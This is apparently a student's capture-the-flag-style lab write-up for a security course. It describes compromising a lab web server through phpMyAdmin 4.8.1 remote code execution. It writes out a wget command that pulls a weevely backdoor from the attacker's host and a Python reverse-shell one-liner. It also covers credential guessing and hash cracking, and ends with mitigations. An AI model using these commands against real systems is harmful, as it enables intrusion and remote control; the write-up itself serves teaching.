Lab 10.2 Exploiting nancurunir.shire.org - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki
Link to report:
https://docs.google.com/document/d/12XetSY7oRwMvElzVnzwryolhjDY4pQ5UadRc5A1EUwk/edit?usp=sharing
Since we only received a fully qualified domain name (FQDN), I knew I had to conduct some recon with tools.
- NSlookup:
Using the tool shodan.io to explore the IP addresses provided from the NSlookup I was able to recognize that the IP's:
-
Public IP Addesses: 76.223.54.146 and 13.248.169.48 assigned to our FQDN target.
-
DNS Server: 10.0.17.2
I was confused as there were two IP's, I decided to use nmap to dive deeper into the FQDN:
- Nmap scan on FQDN:
- Tells me that
76.223.54.146is the active host currently.
Decided to run an nslookup on our FQDN w/ internal DNS server and found the target IP:
Name: nancurunir.shire.org Address: 10.0.5.28
Name: nancurunir.shire.org Address: 10.0.5.28
Now since I have the right IP I can rip a good ol port scan:
Info summarized:
| Open Port | State | Service | Version |
|---|---|---|---|
| 80/tcp | open | http | Apache httpd 2.4.52 ((Ubuntu)) |
Browsing to the website:
At this point I have just been looking at the source of the webpages and something that stood out to me on this initial index.html page was:
Not sure what this alt='shallnotpass' is but will explore
- Dirb Scan + Result:
- Notable findings:
- Directory:
http://10.0.5.28/phpmyadmin/
Browsing to this page:
A login portal!!! I used Firefox's network tab and reloaded the page to view the connection + redirects:
- Notable Findings:
v=4.8.1
Since I know this is a php page I wanted to find the version which is php version = 4.8.1
- Was able to gather avail info on the target and source code of the 10.0.5.28/phpmyadmin login portal:
- Username:
gandalf - PW:
shallnotpass
Admin view of the website:
- Confirmed the phpmyadmin version is
4.8.1and the webserver isapache/2.4.52:
- Knowing mysql was being used a db I looked at the
user table:
- Root is on localhost and I can edit it. Has all permissions we are seeking. Tried the edit mode to see what winfo is avail:
-
Password hash of root: *2B72EB4F3B82A23BA9987F76675B83FE9FE8DDC8
-
Using crackstation.net to crack the hash revealed that the password for root is
gandalfthewhite
After reviewing the searchsploit results that I received earlier, I dove deep into: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
Since I am using remote desktop I can copy and paste, so I copied the exploit code and created a file named: RCE_Exploit50457.py Reviewinf the explanation on exploitdb the syntax is: (Created .py exploit file) (ipaddr) (port) (path) (username) (password) (cmd_to_be_run)
Ttried to run the command: python3 RCE_Exploit50457.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass id, which actually ran!!!!!!:
- Webshell:
Using the tool weevely and the backdoor we created in week 8 (for me it is:mayotte_backdoor.php)I created a webshell: sudo weevely generate <Pasword> ./mayotte_backdoor.php:
- Opening a webserver:
- Now I opened another terminal and ran:
python3 RCE_Exploit50457.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass 'wget http://10.0.17.85:8080/mayotte_backdoor.php'to move the created webshell onto our tagert system with a wget:
- Using weevely to connect to the webshell we just popped onto our target:
10.0.5.28/phpmyadmin/fotp.php:
-
See challanges faced for the explanation of file name change. Had to redo this process.
-
Creating a reverse shell in weebely:
Used the following lab to create the python cmd: export RHOST="10.0.17.85";export RPORT=4449;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
WHICH CREATED THE REVERSE WEBSHELL FOR FOOTHOLD!
- Switch to user gandalf using the password we cracked earlier:
- User Flag:
82745644-c7f3-4250-acba-aa453abb2249
- Root Flag:
22815793-a31c-42e5-ab46-a42241152c26
- PHPmyadmin portal version: 4.8.1 High severity
Exploit: https://www.exploit-db.com/exploits/50457
Explanation of exploit:
The script checks the phpMyAdmin version on the target to ensure it is either 4.8.0 or 4.8.1. Performs a login using the provided credentials. Crafts and executes an SQL query that contains a payload to execute the specified command. Finally, it retrieves the result of the executed command.
Mitigation:
To mitigate the risk, users should update phpMyAdmin to a version that addresses this vulnerability. Upgrade to phpmyadmin 4.8.2 or newer.
-
Utilizing different passwords. Mysql root password is the same as host root.
-
Remove the
alt='shallnotpass'tag from the image on the homepage of10.0.5.28
This lab was extremely challenging and required me to take a step away multiple times. That being said it was the most rewarding.
I had faced some challenges (listed below) but working through them was extremely satisfying. My largest takeaway was explore! Once I gained access to phpmyadmin I took awhile just sifting through the pages and fortunately found the user table. It was really fun using multiple different tools to conduct this lab.
- Challenges Faced:
After running the searchsploit scans and gathering as much data as possible, I was a bit stumped on how to move forward. I had the login portal but 0 credentials. I had a few different exploits to try too. I spoke with a classmate who referred me too the image alt tag I took note of earlier but had 0 clue what shallnotpass meant. They pushed me to think about the target organization and the characters in LOTR. I tried a many different characyters but was able to guess tje username to the PhpMyadmin page with the shallnotpass password.
After uploading the webshell to the target and connecting to the backdoor I ran into a problem:
I was really stumped here since I was really convinced I did the process correct. I went through it again, but this time generated my webshell with the name: mayottenancur.php
Then pulled the webshell to the target and connected with Weevely which worked this time.